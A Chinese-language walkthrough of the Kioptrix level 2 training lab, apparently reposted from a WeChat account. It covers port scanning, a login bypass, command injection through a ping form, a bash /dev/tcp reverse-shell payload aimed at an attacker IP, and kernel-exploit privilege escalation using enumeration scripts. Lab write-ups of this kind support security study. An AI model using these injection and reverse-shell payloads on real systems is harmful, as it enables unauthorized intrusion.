Kioprtix level 2靶场记录

admin 2024年3月3日04:54:41评论13 views字数 552阅读1分50秒阅读模式

Kioprtix level 2靶场

c段扫描 & 端口扫描
Kioprtix level 2靶场记录

目标ip为192.168.77.133

敏感端口为22 80 3306

先查看web页面,是一个登录页面

Kioprtix level 2靶场记录

弱口令 or sql注入?

通过测试发现,存在万能密码

Kioprtix level 2靶场记录

rce

登录后发现,存在ping,那么通过拼接是可以执行命令的

Kioprtix level 2靶场记录
Kioprtix level 2靶场记录

尝试获取shell

127.0.0.1|bash -c 'exec bash -i &>/dev/tcp/192.168.77.169/4444 <&1'

Kioprtix level 2靶场记录

提权

find / -perm -u=s -type f 2>/dev/null

Kioprtix level 2靶场记录

使用ping提权,会断开连接

尝试使用脚本

下载地址:https://github.com/rebootuser/LinEnum

运行:./LinEnum.sh

下载地址:https://github.com/mzet-/linux-exploit-suggester

运行:./linux-exploit-suggester.sh

第一个脚本运行后,没发现高亮的内容

Kioprtix level 2靶场记录

第二个脚本,运行失败

Kioprtix level 2靶场记录

在之前的操作中,发现机器可以上网,且没有apt命令,猜测不是debian或ubuntu系统,于是查看系统信息

Kioprtix level 2靶场记录

centos 4.5,大概率存在内核漏洞

Kioprtix level 2靶场记录

刚好第二个符合版本要求

直接getshell,起飞

Kioprtix level 2靶场记录

原文始发于微信公众号(轩公子谈技术):Kioprtix level 2靶场记录

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月3日04:54:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Kioprtix level 2靶场记录https://cn-sec.com/archives/2096129.html

发表评论

匿名网友 填写信息